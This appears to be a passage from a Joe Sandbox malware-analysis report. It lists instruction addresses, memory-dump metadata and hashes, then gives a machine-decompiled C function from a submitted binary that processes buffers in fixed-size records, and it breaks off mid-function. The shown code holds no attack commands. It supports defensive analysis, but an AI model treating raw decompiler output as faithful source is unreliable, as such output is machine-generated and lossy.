0x00a384e0
0x00a384e3
0x00a384e6
0x00a384e6
0x00a384ef
0x00a3857a
0x00a38580
0x00a38586
0x00a3859e
0x00a3859e
0x00a385a4
0x00a385bc
0x00a385bc
0x00a385bf
0x00a385c5
0x00a385e2
0x00a385e7
0x00a385eb
0x00a385f5
0x00a38600
0x00a38605
0x00a38607
0x00a3860b
0x00a3860d
0x00a3860f
0x00a38613
0x00a38615
0x00a38617
0x00a38617
0x00a38613
0x00a3861f
0x00a38625
0x00a38633
0x00a3863b
0x00a38642
0x00a38645
0x00a3869c
0x00a386a1
0x00a386a3
0x00a386a5
0x00a386ab
0x00a386b1
0x00a386b5
0x00a386b5
0x00a386b5
0x00a386b5
0x00a38647
0x00a3864a
0x00a38650
0x00a38652
0x00a38654
0x00a38658
0x00a3865a
0x00a38661
0x00a38666
0x00a38667
0x00a3866e
0x00a38673
0x00a3867d
0x00a3867f
0x00a38695
0x00a38681
0x00a38683
0x00a3868a
0x00a3868c
0x00a3868c
0x00a3867f
0x00a38658
0x00a38652
0x00a386be
0x00a386c3
0x00a386db
0x00a386e6
0x00a386ee
0x00a386f1
0x00a386f3
0x00a386f5
0x00a386f7
0x00a386fa
0x00a386fd
0x00a38703
0x00a38721
0x00a38721
0x00a38724
0x00a3873c
0x00a3873f
0x00a38744
0x00a3874a
0x00a3874b
0x00a3874d
0x00a38756
0x00a38756
0x00a38758
0x00a3875b
0x00a38765
0x00a3876c
0x00a38771
0x00a38773
0x00a38543
0x00a38543
0x00a38543
0x00a38545
0x00a3854b
0x00a38553
0x00a38553
0x00a38779
0x00a3877e
0x00a38786
0x00a38787
0x00a3878a
0x00a38791
0x00a38792
0x00a38799
0x00a3879c
0x00a387b3
0x00a387b3
0x00a387b6
0x00a387b6
0x00a387bb
0x00a387be
0x00a387c5
0x00a387c6
0x00a387c9
0x00a387cc
0x00a387d7
0x00a387d7
0x00a387da
0x00a387e1
0x00a387e1
0x00a387e7
0x00a387ee
0x00a387ef
0x00a387fd
0x00a38802
0x00a38804
0x00a3883c
0x00a3883f
0x00a3884b
0x00a3884b
0x00a3884b
0x00a3884e
0x00a3884e
0x00a38858
0x00a3885d
0x00a3885f
0x00a38883
0x00a38883
0x00a3888a
0x00000000
0x00000000
0x00a3888c
0x00a38896
0x00a3889b
0x00a3889d
0x00a3897f
0x00000000
0x00a3897f
0x00a388a3
0x00a388a6
0x00a388b4
0x00a388b5
0x00a388b5
0x00a388b7
0x00a388b9
0x00a388d5
0x00a388df
0x00a388e9
0x00a388fb
0x00a38900
0x00a38907
0x00a389a5
0x00a389a5
0x00a389a8
0x00a389a8
0x00a389ac
0x00a389b2
0x00a389b7
0x00a389bd
0x00a389c2
0x00a389ca
0x00a389cb
0x00a389ce
0x00a389d3
0x00a389d4
0x00a389d6
0x00a38a5f
0x00a38a61
0x00a38a66
0x00a38a68
0x00a38ab6
0x00a38ab9
0x00a38abb
0x00a38ad5
0x00a38ad7
0x00a38ad7
0x00a38ad8
0x00a38ad8
0x00a38adf
0x00a38b14
0x00a38b16
0x00a3910c
0x00a3910c
0x00a39110
0x00a39116
0x00a3911b
0x00a3911f
0x00a39122
0x00a39125
0x00a39127
0x00a39127
0x00a39127
0x00a39127
0x00a3912d
0x00a3912d
0x00a39131
0x00000000
0x00000000
0x00a39137
0x00a39139
0x00a38576
0x00a38576
0x00000000
0x00a38576
0x00a3913f
0x00a39145
0x00a38513
0x00a38515
0x00000000
0x00a38515
0x00a3914b
0x00a3914d
0x00000000
0x00a3914d
0x00a38b1c
0x00a38b1c
0x00a38b1f
0x00a38b1f
0x00a38b22
0x00a38b29
0x00a38b3b
0x00a38b3b
0x00a38b3e
0x00a38b40
0x00a38b87
0x00a38b87
0x00a38b8b
0x00a38b8d
0x00a38b95
0x00a38b95
0x00a38ba9
0x00a38baf
0x00a38bb5
0x00a38bbb
0x00a38bcc
0x00a38be2
0x00a38be7
0x00a38bed
0x00a38bf0
0x00a38bf6
0x00a38bf9
0x00a38bfc
0x00a38c03
0x00a38c06
0x00a38c0c
0x00a38c11
0x00a38c14
0x00a38c16
0x00a38c19
0x00a38c1c
0x00a38c1f
0x00a38c22
0x00a38c25
0x00a38c27
0x00a38cd6
0x00a38cd6
0x00a38cd9
0x00a38ce0
0x00a38ce7
0x00a38ceb
0x00a38d01
0x00a38d01
0x00a38d03
0x00a38d06
0x00a38d06
0x00a38d0a
0x00a38d0e
0x00a38d12
0x00a38e40
0x00a38e47
0x00a38e49
0x00a38e50
0x00a38e73
0x00a38e74
0x00a38e7a
0x00a38e7f
0x00a38e91
0x00a38e97
0x00a38e99
0x00a38e9f
0x00a38eb9
0x00a38e52
0x00a38e52
0x00a38e58
0x00a38e5e
0x00a38e5f
0x00a38e5f
0x00a38e50
0x00a38ebe
0x00a38ec0
0x00a38ec5
0x00a38ecc
0x00a38efe
0x00a38efe
0x00a38efe
0x00a38f00
0x00a38f02
0x00a38f02
0x00a38f09
0x00a38f13
0x00a38f1a
0x00a38f39
0x00a38f39
0x00a38f3d
0x00a38f40
0x00a38f98
0x00a38f98
0x00a38f9c
0x00a38f9f
0x00a38fb2
0x00a38fb2
0x00a38fb2
0x00a38fb4
0x00a38fb4
0x00a38fb8
0x00000000
0x00000000
0x00a38fbe
0x00a38fc1
0x00a38fc5
0x00a38fd1
0x00a38fd1
0x00a38fd5
0x00a38ff0
0x00a38ff0
0x00a38ff2
0x00a39007
0x00a39007
0x00a39009
0x00a390cd
0x00a390cd
0x00a390d0
0x00a390d7
0x00a390df
0x00a390e6
0x00a390eb
0x00a390ed
0x00a390f6
0x00a39100
0x00a39100
0x00a390ed
0x00a39105
0x00000000
0x00a39105
0x00a3900f
0x00a39014
0x00a39016
0x00a39019
0x00a3901f
0x00a3901f
0x00a39021
0x00a39033
0x00a39033
0x00a39039
0x00a3903e
0x00a39047
0x00a3905b
0x00a39062
0x00a39075
0x00a39077
0x00a39080
0x00a39085
0x00a3908b
0x00a3909a
0x00a390ad
0x00a390c0
0x00a390c2
0x00a390c5
0x00a390ca
0x00000000
0x00a390ca
0x00a39023
0x00a39029
0x00000000
0x00000000
0x00a3902b
0x00a39031
0x00000000
0x00000000
0x00000000
0x00a39031
0x00a3901b
0x00a3901d
0x00000000
0x00000000
0x00000000
0x00a3901d
0x00a38ff4
0x00a38ff7
0x00a38ffe
0x00000000
0x00000000
0x00a39004
0x00000000
0x00a39004
0x00a38fd7
0x00a38fd9
0x00000000
0x00000000
0x00a38fdb
0x00a38fe2
0x00000000
0x00000000
0x00a38fe8
0x00a38fea
0x00000000
0x00000000
0x00000000
0x00a38fea
0x00a38fc7
0x00a38fcb
0x00000000
0x00000000
0x00000000
0x00a38fcb
0x00a38fa1
0x00a38fa8
0x00000000
0x00000000
0x00a38faa
0x00a38fac
0x00000000
0x00000000
0x00a38fae
0x00000000
0x00a38fae
0x00a38f42
0x00a38f46
0x00000000
0x00000000
0x00a38f48
0x00a38f4a
0x00000000
0x00000000
0x00a38f4c
0x00a38f52
0x00a38f71
0x00a38f71
0x00a38f73
0x00a38f73
0x00a38f74
0x00a38f80
0x00a38f8c
0x00a38f90
0x00a38f95
0x00000000
0x00a38f95
0x00a38f54
0x00a38f5a
0x00a38f64
0x00a38f64
0x00a38f6b
0x00000000
0x00000000
0x00a38f6d
0x00000000
0x00a38f6d
0x00a38f5c
0x00a38f62
0x00000000
0x00000000
0x00000000
0x00a38f62
0x00a38f1c
0x00a38f22
0x00000000
0x00000000
0x00a38f24
0x00a38f2e
0x00a38f2e
0x00a38f30
0x00a38f32
0x00a38f32
0x00000000
0x00a38f30
0x00a38f26
0x00a38f2c
0x00000000
0x00000000
0x00000000
0x00a38f2c
0x00a38f0b
0x00000000
0x00a38f0b
0x00a38edd
0x00a38eef
0x00a38ef4
0x00a38ef6
0x00000000
0x00000000
0x00a38ef8
0x00a38efa
0x00000000
0x00a38efa
0x00a38d18
0x00a38d1e
0x00a38d21
0x00a38d8a
0x00a38d8f
0x00a38d9d
0x00a38da2
0x00a38da7
0x00a38dad
0x00a38db0
0x00a38db7
0x00a38db8
0x00a38dbd
0x00a38dc0
0x00a38dc2
0x00a38e19
0x00a38e19
0x00a38e1c
0x00a38e1c
0x00a38e23
0x00a38d57
0x00a38d57
0x00a38d59
0x00a38e36
0x00a38e36
0x00a38e36
0x00a38e38
0x00a38e38
0x00000000
0x00a38e38
0x00a38d5f
0x00a38d5f
0x00a38d61
0x00000000
0x00000000
0x00a38d67
0x00000000
0x00a38d67
0x00a38e29
0x00a38e2b
0x00000000
0x00000000
0x00a38d53
0x00a38d53
0x00000000
0x00a38d53
0x00a38dc4
0x00a38dcc
0x00000000
0x00000000
0x00a38dce
0x00a38dd4
0x00a38de0
0x00a38de1
0x00a38de4
0x00a38dfa
0x00a38dfb
0x00a38e02
0x00a38e07
0x00a38e09
0x00a38e0c
0x00a38e0c
0x00a38e0e
0x00a38d50
0x00a38d50
0x00000000
0x00a38d50
0x00a38e14
0x00000000
0x00a38e14
0x00a38de6
0x00a38de9
0x00a38dee
0x00a38dee
0x00a38df0
0x00000000
0x00a38df0
0x00a38d23
0x00a38d26
0x00000000
0x00000000
0x00a38d28
0x00a38d2b
0x00a38d6e
0x00a38d6e
0x00a38d70
0x00000000
0x00000000
0x00a38d7c
0x00a38d83
0x00000000
0x00a38d83
0x00a38d2d
0x00a38d30
0x00000000
0x00000000
0x00a38d32
0x00a38d35
0x00000000
0x00000000
0x00a38d44
0x00a38d49
0x00a38d4b
0x00a38d4d
0x00000000
0x00a38d4d
0x00a38ced
0x00a38cef
0x00000000
0x00000000
0x00a38cf3
0x00a38cf4
0x00a38cf8
0x00000000
0x00000000
0x00a38cfa
0x00a38cfc
0x00000000
0x00a38cfc
0x00a38c2d
0x00a38c33
0x00000000
0x00000000
0x00a38c39
0x00a38c41
0x00a38c47
0x00a38c49
0x00a38cd1
0x00a38cd1
0x00a38cd1
0x00a38cd3
0x00000000
0x00a38cd3
0x00a38c4f
0x00a38c59
0x00a38c59
0x00a38c69
0x00a38c6c
0x00a38c6e
0x00a38cce
0x00a38cce
0x00000000
0x00a38cce
0x00a38c70
0x00a38c76
0x00a38c76
0x00a38c7a
0x00000000
0x00000000
0x00a38c7e
0x00a38c80
0x00a38ca5
0x00a38cab
0x00a38cb7
0x00a38cc2
0x00a38ccb
0x00000000
0x00a38ccb
0x00a38c82
0x00a38c8c
0x00a38c8e
0x00a38c93
0x00a38c99
0x00000000
0x00000000
0x00a38c9b
0x00000000
0x00000000
0x00a38c9d
0x00a38ca3
0x00000000
0x00000000
0x00000000
0x00a38ca3
0x00a38c84
0x00a38c8a
0x00000000
0x00000000
0x00000000
0x00a38c8a
0x00a38c72
0x00a38c74
0x00000000
0x00000000
0x00000000
0x00a38c74
0x00a38c51
0x00a38c57
0x00000000
0x00000000
0x00000000
0x00a38c57
0x00a38b8f
0x00a38b8f
0x00a38b8f
0x00a38b8f
0x00000000
0x00a38b8f
0x00a38b46
0x00a38b49
0x00a38b4a
0x00a38b4d
0x00a38b4f
0x00a38b5a
0x00a38b5c
0x00a38b6b
0x00a38b7d
0x00a38b7d
0x00a38b5c
0x00000000
0x00a38b4d
0x00a38b2b
0x00a38b32
0x00a38b39
0x00a38b84
0x00000000
0x00a38b84
0x00000000
0x00a38b39
0x00a38ae2
0x00a38ae5
0x00a38aec
0x00a38af3
0x00a38af8
0x00a38afa
0x00000000
0x00000000
0x00a38afc
0x00a38afe
0x00a38b01
0x00a38b01
0x00a38b07
0x00a38b0c
0x00000000
0x00a38b0c
0x00a38abd
0x00a38ac6
0x00a38ac7
0x00a38acc
0x00a38ace
0x00a38ad1
0x00a38ad1
0x00a38ad3
0x00000000
0x00000000
0x00000000
0x00a38ad3
0x00a38a6a
0x00a38a6e
0x00a38a74
0x00a38a77
0x00a38a7b
0x00a38a83
0x00a38a84
0x00a38a87
0x00a38a8b
0x00a38a8c
0x00a38a8f
0x00a38a91
0x00a38a97
0x00a38a9d
0x00a38a9f
0x00a38aa5
0x00a38aac
0x00a38aaf
0x00a38aaf
0x00a38a9d
0x00a38a8f
0x00a38a87
0x00a38a7b
0x00000000
0x00a38a6e
0x00a389dc
0x00a389df
0x00000000
0x00000000
0x00a389e1
0x00a389e4
0x00a389e6
0x00000000
0x00000000
0x00a389ec
0x00a389ef
0x00a389f2
0x00000000
0x00000000
0x00a389f8
0x00a389fb
0x00a38a02
0x00000000
0x00000000
0x00a38a0a
0x00a38a11
0x00a38a14
0x00a38a19
0x00a38a1b
0x00a38a4c
0x00a38a4c
0x00a38a50
0x00000000
0x00000000
0x00a38a56
0x00a38a58
0x00a38a5a
0x00000000
0x00a38a5a
0x00a38a1d
0x00a38a21
0x00000000
0x00000000
0x00a38a23
0x00a38a2b
0x00a38a2c
0x00a38a2d
0x00a38a33
0x00a38a36
0x00a38a3d
0x00a38a42
0x00a38a43
0x00a38a44
0x00a38a47
0x00000000
0x00a38a47
0x00a3890d
0x00a38914
0x00000000
0x00000000
0x00a3891c
0x00a38927
0x00a3892c
0x00a3892f
0x00a38931
0x00000000
0x00000000
0x00a38933
0x00a3893a
0x00a3893d
0x00000000
0x00000000
0x00a3893f
0x00a38946
0x00a38950
0x00a38951
0x00a3898b
0x00a3898d
0x00a38999
0x00a389a0
0x00000000
0x00a389a0
0x00a38953
0x00a38958
0x00a38966
0x00a3896b
0x00a3896f
0x00a38975
0x00a38975
0x00a38883
0x00a38868
0x00a3886f
0x00a38874
0x00a3887b
0x00000000
0x00a3887b
0x00a3880d
0x00a38813
0x00a38818
0x00a3881a
0x00000000
0x00000000
0x00a3881c
0x00a38823
0x00a38835
0x00a38837
0x00000000
0x00a38837
0x00a38826
0x00a3882c
0x00a38831
0x00a38833
0x00000000
0x00000000
0x00000000
0x00a38833
0x00a387dc
0x00a387df
0x00000000
0x00000000
0x00000000
0x00a387df
0x00a387ce
0x00a387d5
0x00000000
0x00000000
0x00000000
0x00a387d5
0x00a3879e
0x00a387a5
0x00000000
0x00000000
0x00a387a7
0x00a387ab
0x00a387b1
0x00000000
0x00000000
0x00000000
0x00a387b1
0x00a3874f
0x00a38752
0x00a38754
0x00000000
0x00000000
0x00000000
0x00a38754
0x00a38726
0x00a38726
0x00a3872c
0x00a3872f
0x00a38732
0x00a38734
0x00000000
0x00000000
0x00a3873a
0x00a3873a
0x00000000
0x00a3873a
0x00a38705
0x00a38708
0x00a3870e
0x00000000
0x00000000
0x00a38710
0x00a38716
0x00000000
0x00000000
0x00a3871c
0x00000000
0x00a3871c
0x00a385cd
0x00a385d3
0x00000000
0x00000000
0x00a385d5
0x00a385dc
0x00000000
0x00000000
0x00000000
0x00a385dc
0x00a385a6
0x00a385b0
0x00a385b0
0x00a385b6
0x00000000
0x00a385b6
0x00a385a8
0x00a385ae
0x00000000
0x00000000
0x00000000
0x00a385ae
0x00a38588
0x00a38592
0x00a38592
0x00a38598
0x00000000
0x00a38598
0x00a3858a
0x00a38590
0x00000000
0x00000000
0x00000000
0x00a38590
0x00a384f8
0x00a3851c
0x00a3851f
0x00000000
0x00000000
0x00a38521
0x00a38528
0x00000000
0x00000000
0x00a3852a
0x00a3852b
0x00a3852c
0x00a3852d
0x00a3852e
0x00a38533
0x00a38535
0x00a38558
0x00a3856c
0x00a38574
0x00000000
0x00a38574
0x00a38537
0x00a3853e
0x00000000
0x00a384fa
0x00a38501
0x00a3850e
0x00a3850e
0x00000000
0x00a38501
0x00a384f8
0x00a384c4
0x00000000
0x00000000
0x00a384c6
0x00a384c7
0x00a384c8
0x00a384cb
0x00a384cc
0x00a384cd
0x00a384d7
0x00000000
0x00a384d9
0x00a384d9
0x00a384dc
0x00000000
0x00a384dc

APIs

__EH_prolog.LIBCMT ref: 00A38493

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 24b4215dd97d3b241744d0dac658cc61a873950c20be91d926603f70203499e8
Instruction ID: 2978016e743ba0d9d4b5c8c4719b6f5495598a3f8fd3699eb85cfc46f4e82817
Opcode Fuzzy Hash: 24b4215dd97d3b241744d0dac658cc61a873950c20be91d926603f70203499e8
Instruction Fuzzy Hash: EA82FA71904345AEDF25DF64C891BFEBBB9BF05300F0841B9F8499B242DB795A88CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A46CDC Relevance: .3, Instructions: 343
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00A46CDC(signed int __ecx, void* __edx) {
				void* __ebp;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t176;
				signed int _t179;
				intOrPtr _t182;
				signed int _t185;
				signed int _t186;
				void* _t189;
				void* _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr* _t203;
				signed int _t206;
				void* _t217;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				signed int _t230;
				signed int _t232;
				intOrPtr _t235;
				intOrPtr* _t236;
				intOrPtr* _t242;
				intOrPtr* _t244;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t257;
				signed int _t265;
				intOrPtr* _t269;
				intOrPtr _t272;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t280;
				intOrPtr* _t282;
				void* _t283;
				signed int _t284;
				intOrPtr* _t285;
				intOrPtr _t287;
				void* _t289;
				void* _t290;
				void* _t292;

				_t223 = __ecx; // executed
				E00A4359E(__ecx, __edx); // executed
				E00A44D0A(__ecx,  *((intOrPtr*)(_t290 + 0x244)));
				_t282 = _t223 + 0x18;
				_t249 = 0;
				 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				if( *(_t223 + 0x1c) +  *(_t223 + 0x1c) == 0) {
					 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				} else {
					_t247 = 0;
					do {
						_t220 =  *_t282;
						_t247 = _t247 + 0x4ae4;
						_t249 = _t249 + 1;
						 *((char*)(_t220 + _t247 - 0x13)) = 0;
						 *((char*)(_t220 + _t247 - 0x11)) = 0;
					} while (_t249 <  *(_t223 + 0x1c) +  *(_t223 + 0x1c));
				}
				_t226 = 5;
				memcpy( *_t282 + 0x18, _t223 + 0x8c, _t226 << 2);
				E00A50320( *_t282 + 0x30, _t223 + 0xa0, 0x4a9c);
				_t292 = _t290 + 0x18;
				 *(_t292 + 0x30) = 0;
				_t265 = 0;
				 *((char*)(_t292 + 0x1b)) = 0;
				 *((char*)(_t292 + 0x13)) = 0;
				while(1) {
					L6:
					_t272 = 0;
					 *((intOrPtr*)(_t292 + 0x1c)) = 0;
					while(1) {
						L7:
						_push(0x00400000 - _t265 & 0xfffffff0);
						_push( *((intOrPtr*)(_t223 + 0x20)) + _t265);
						_t166 = E00A3D114( *_t223);
						 *((intOrPtr*)(_t292 + 0x34)) = _t166;
						if(_t166 < 0) {
							break;
						}
						_t265 = _t265 + _t166;
						 *(_t292 + 0x2c) = _t265;
						if(_t265 != 0) {
							if(_t166 <= 0 || _t265 >= 0x400) {
								if(_t272 >= _t265) {
									goto L69;
								} else {
									while(1) {
										_t252 = 0;
										 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
										 *(_t292 + 0x24) = 0;
										_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
										if(_t176 != 0) {
										}
										L13:
										_t235 = 0;
										 *((intOrPtr*)(_t292 + 0x20)) = 0;
										while(1) {
											_t280 =  *_t282 + _t235;
											 *(_t292 + 0x30) = _t252;
											_t29 = _t280 + 4; // 0x4
											_t236 = _t29;
											 *_t280 = _t223;
											if( *((char*)(_t280 + 0x4ad3)) == 0) {
												goto L16;
											}
											L15:
											 *(_t280 + 0x4acc) = _t265;
											L18:
											_t42 = _t280 + 0x18; // 0x18
											_t285 = _t42;
											 *((char*)(_t280 + 0x4ad3)) = 0;
											 *(_t280 + 0x4ae0) = _t252;
											 *((char*)(_t280 + 0x4ad2)) = _t176 & 0xffffff00 |  *((intOrPtr*)(_t292 + 0x34)) == 0x00000000;
											if( *((char*)(_t280 + 0x14)) != 0) {
												L23:
												if( *((char*)(_t292 + 0x1b)) != 0 ||  *_t285 > 0x20000) {
													 *((char*)(_t280 + 0x4ad1)) = 1;
													 *((char*)(_t292 + 0x1b)) = 1;
												} else {
													 *(_t292 + 0x28) =  *(_t292 + 0x28) + 1;
												}
												_t287 =  *((intOrPtr*)(_t292 + 0x1c)) +  *((intOrPtr*)(_t280 + 0x24)) +  *_t285;
												_t252 = _t252 + 1;
												 *((intOrPtr*)(_t292 + 0x1c)) = _t287;
												_t235 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
												 *(_t292 + 0x24) = _t252;
												 *((intOrPtr*)(_t292 + 0x20)) = _t235;
												_t217 = _t265 - _t287;
												if(_t217 < 0 ||  *((char*)(_t280 + 0x28)) == 0) {
													if(_t217 >= 0x400) {
														_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
														if(_t252 < _t176) {
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t280 =  *_t282 + _t235;
															 *(_t292 + 0x30) = _t252;
															_t29 = _t280 + 4; // 0x4
															_t236 = _t29;
															 *_t280 = _t223;
															if( *((char*)(_t280 + 0x4ad3)) == 0) {
																goto L16;
															}
														}
													}
												}
											} else {
												_push(_t285);
												_push(_t236);
												 *((char*)(_t280 + 0x14)) = 1;
												if(E00A43E0B(_t223) == 0 ||  *((char*)(_t280 + 0x29)) == 0 &&  *((char*)(_t223 + 0xe662)) == 0) {
													 *((char*)(_t292 + 0x13)) = 1;
												} else {
													_t252 =  *(_t292 + 0x24);
													 *((char*)(_t223 + 0xe662)) = 1;
													goto L23;
												}
											}
											break;
											L16:
											E00A3A85A(_t236,  *((intOrPtr*)(_t223 + 0x20)) +  *((intOrPtr*)(_t292 + 0x1c)));
											_t33 = _t280 + 4; // 0x4
											_t236 = _t33;
											 *((intOrPtr*)(_t236 + 4)) = 0;
											_t176 = _t265 -  *((intOrPtr*)(_t292 + 0x1c));
											__eflags = _t176;
											 *_t236 = 0;
											 *(_t280 + 0x4acc) = _t176;
											if(_t176 != 0) {
												 *((char*)(_t280 + 0x4ad0)) = 0;
												 *((char*)(_t280 + 0x14)) = 0;
												 *((char*)(_t280 + 0x2c)) = 0;
												_t252 =  *(_t292 + 0x24);
												goto L18;
											}
											break;
										}
										L33:
										_t232 =  *(_t292 + 0x28);
										_t275 = _t232 /  *(_t223 + 0x1c);
										_t179 = _t232;
										__eflags = _t179 %  *(_t223 + 0x1c);
										if(_t179 %  *(_t223 + 0x1c) != 0) {
											_t275 = _t275 + 1;
											__eflags = _t275;
										}
										_t283 = 0;
										__eflags = _t232;
										if(_t232 != 0) {
											_t269 =  *((intOrPtr*)(_t292 + 0x14));
											_t257 = 0;
											_t202 = _t275 * 0x4ae4;
											__eflags = _t202;
											 *((intOrPtr*)(_t292 + 0x20)) = 0;
											 *(_t292 + 0x38) = _t202;
											_t203 = _t292 + 0x40;
											do {
												_t258 = _t257 +  *_t269;
												_t244 = _t203;
												 *((intOrPtr*)(_t292 + 0x3c)) = _t203 + 8;
												_t206 =  *(_t292 + 0x28) - _t283;
												 *_t244 = _t257 +  *_t269;
												__eflags = _t275 - _t206;
												if(_t275 < _t206) {
													_t206 = _t275;
												}
												__eflags =  *(_t292 + 0x24) - 1;
												 *(_t244 + 4) = _t206;
												if( *(_t292 + 0x24) != 1) {
													E00A40F86( *((intOrPtr*)(_t223 + 0x14)), E00A477C0, _t244);
												} else {
													E00A47153(_t223, _t258);
												}
												_t283 = _t283 + _t275;
												_t257 =  *((intOrPtr*)(_t292 + 0x20)) +  *(_t292 + 0x38);
												_t203 =  *((intOrPtr*)(_t292 + 0x3c));
												 *((intOrPtr*)(_t292 + 0x20)) = _t257;
												__eflags = _t283 -  *(_t292 + 0x28);
											} while (_t283 <  *(_t292 + 0x28));
											_t265 =  *(_t292 + 0x2c);
										}
										_t284 =  *(_t292 + 0x24);
										__eflags = _t284;
										if(_t284 == 0) {
											_t272 =  *((intOrPtr*)(_t292 + 0x1c));
											goto L68;
										} else {
											E00A411CF( *((intOrPtr*)(_t223 + 0x14)));
											_t276 = 0;
											__eflags = _t284;
											if(_t284 == 0) {
												L55:
												__eflags =  *((char*)(_t292 + 0x13));
												if( *((char*)(_t292 + 0x13)) == 0) {
													_t182 =  *((intOrPtr*)(_t292 + 0x1c));
													_t278 = _t265 - _t182;
													__eflags = _t278 - 0x400;
													if(_t278 < 0x400) {
														__eflags = _t278;
														if(__eflags >= 0) {
															if(__eflags > 0) {
																__eflags = _t182 +  *((intOrPtr*)(_t223 + 0x20));
																E00A50320( *((intOrPtr*)(_t223 + 0x20)), _t182 +  *((intOrPtr*)(_t223 + 0x20)), _t278);
																_t292 = _t292 + 0xc;
															}
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t265 = _t278;
															goto L6;
														}
													} else {
														_t282 =  *((intOrPtr*)(_t292 + 0x14));
														_t272 = _t182;
														__eflags = _t272 - _t265;
														if(_t272 >= _t265) {
															goto L7;
														} else {
															_t252 = 0;
															 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
															 *(_t292 + 0x24) = 0;
															_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
															if(_t176 != 0) {
															}
															goto L33;
														}
													}
												}
											} else {
												_t185 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t292 + 0x20)) = 0;
												do {
													_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14)))) + _t185;
													__eflags =  *((char*)(_t289 + 0x4ad1));
													if( *((char*)(_t289 + 0x4ad1)) != 0) {
														L50:
														_t186 = E00A477EF(_t223, _t289);
														__eflags = _t186;
														if(_t186 != 0) {
															goto L51;
														}
													} else {
														_t201 = E00A4390D(_t223, _t289);
														__eflags = _t201;
														if(_t201 != 0) {
															__eflags =  *((char*)(_t289 + 0x4ad1));
															if( *((char*)(_t289 + 0x4ad1)) == 0) {
																L51:
																__eflags =  *((char*)(_t289 + 0x4ad0));
																if( *((char*)(_t289 + 0x4ad0)) == 0) {
																	__eflags =  *((char*)(_t289 + 0x4ad3));
																	if( *((char*)(_t289 + 0x4ad3)) != 0) {
																		_t241 =  *((intOrPtr*)(_t223 + 0x20));
																		_t189 =  *((intOrPtr*)(_t289 + 0x10)) -  *((intOrPtr*)(_t223 + 0x20)) +  *(_t289 + 4);
																		__eflags = _t265 - _t189;
																		if(_t265 > _t189) {
																			_t265 = _t265 - _t189;
																			 *(_t292 + 0x38) = _t265;
																			E00A50320(_t241, _t189 + _t241, _t265);
																			_t292 = _t292 + 0xc;
																			 *((intOrPtr*)(_t289 + 0x18)) =  *((intOrPtr*)(_t289 + 0x18)) +  *(_t289 + 0x20) -  *(_t289 + 4);
																			 *(_t289 + 0x24) =  *(_t289 + 0x24) & 0x00000000;
																			 *(_t289 + 0x20) =  *(_t289 + 0x20) & 0x00000000;
																			 *(_t289 + 4) =  *(_t289 + 4) & 0x00000000;
																			 *((intOrPtr*)(_t289 + 0x10)) =  *((intOrPtr*)(_t223 + 0x20));
																			__eflags = _t276;
																			if(_t276 != 0) {
																				_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
																				E00A50320(_t196, _t289, 0x4ae4);
																				_t242 =  *((intOrPtr*)(_t292 + 0x20));
																				_t292 = _t292 + 0xc;
																				 *((intOrPtr*)( *_t242 + 0x4ad4)) =  *((intOrPtr*)(_t196 + 0x4ad4));
																				 *((intOrPtr*)( *_t242 + 0x4adc)) =  *((intOrPtr*)(_t196 + 0x4adc));
																				_t265 =  *(_t292 + 0x2c);
																				 *((char*)(_t289 + 0x4ad3)) = 0;
																			}
																			_t272 = 0;
																			 *((intOrPtr*)(_t292 + 0x1c)) = 0;
																			L68:
																			_t282 =  *((intOrPtr*)(_t292 + 0x14));
																			goto L69;
																		}
																	} else {
																		__eflags =  *((char*)(_t289 + 0x28));
																		if( *((char*)(_t289 + 0x28)) == 0) {
																			goto L54;
																		}
																	}
																}
															} else {
																goto L50;
															}
														}
													}
													goto L70;
													L54:
													_t276 = _t276 + 1;
													_t185 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
													 *((intOrPtr*)(_t292 + 0x20)) = _t185;
													__eflags = _t276 -  *(_t292 + 0x24);
												} while (_t276 <  *(_t292 + 0x24));
												goto L55;
											}
										}
										goto L70;
									}
								}
							} else {
								L69:
								__eflags =  *((char*)(_t292 + 0x13));
								if( *((char*)(_t292 + 0x13)) == 0) {
									continue;
								}
							}
						}
						break;
					}
					L70:
					 *(_t223 + 0x7c) =  *(_t223 + 0x7c) &  *(_t223 + 0xe6dc);
					E00A45202(_t223);
					_t250 =  *(_t292 + 0x30) * 0x4ae4;
					_t230 = 5;
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
					__eflags = _t170 + _t250 + 0x30;
